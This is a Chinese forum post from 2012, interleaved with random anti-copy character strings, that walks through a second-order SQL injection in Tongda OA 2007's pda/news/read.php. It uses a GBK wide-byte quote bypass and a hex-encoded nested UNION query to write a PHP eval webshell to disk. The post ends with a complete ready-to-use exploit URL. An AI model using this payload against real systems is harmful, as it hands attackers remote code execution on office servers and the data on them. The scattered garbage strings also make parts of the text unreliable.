目前测试通达OA2007版本( N" r% Y1 Y# j
2 s7 e5 a# R0 {$ R1 M6 F0 p( X
% ?" }! @0 x& `( R. I
Office Anywhere 2007 网络智能办公系统
) x2 ^/ k6 H; e % g; a3 i# A2 J
http://127.0.0.1/pda/news/read.php?P=%cf' 猪点。 暴web目录..
3 P* `/ z, ^2 u$ I: e: {; H7 B
% H6 y2 G3 y* \9 N* E8 U" O 4 G2 l# U6 P! J/ a' S& O% Y
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的 T5 e/ r8 f# w6 F2 j" K4 S
, d& l4 W2 o# M- ~( Y: @
例如:SELECT * from USER where USER_ID='{$USERNAME}' 4 b. o% j8 s6 @7 h z( {
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
& d9 t. i. ?! B! a) [( U# l : O" h+ \9 w6 S* O M
这个时候我们是不是可以组合起来使用哪?
$ }; S) a* W* P3 ]! x5 o
* a" {7 b9 V" A, @ w0 G! N+ F第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
0 ]! s) X* N( P) Wunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
; T( k8 r! f Z9 V( f f O. _6 e+ Q; l! Z
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了( r$ s! Q) C& C" b( K- a
- ~5 }+ u. L( R+ q" n
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。# V# W& F5 N" H2 s
7 ?) o7 P" ^( e' d4 Z2 h* ?$ h那么我们用字符串格式带入进行hex编码# M, [- ]2 k+ y+ G# y, `
& [* J9 P w* s. i, K%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
( b' r# a* k g. F$ g6 u
) p+ h" A, B5 O% S6 q5 k. J, n测试ok,获取oa的webshell
T! V# @+ _5 D1 M+ I3 J5 {% C t8 z0 |
0 v) X) |2 ^& u& U3 `+ L) E
T, t+ {# G# r+ H! j6 D# Dpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
# U& A [9 Y6 D直接getwebshell |
发表于 2012-12-20 08:09:24
收藏
支持
反对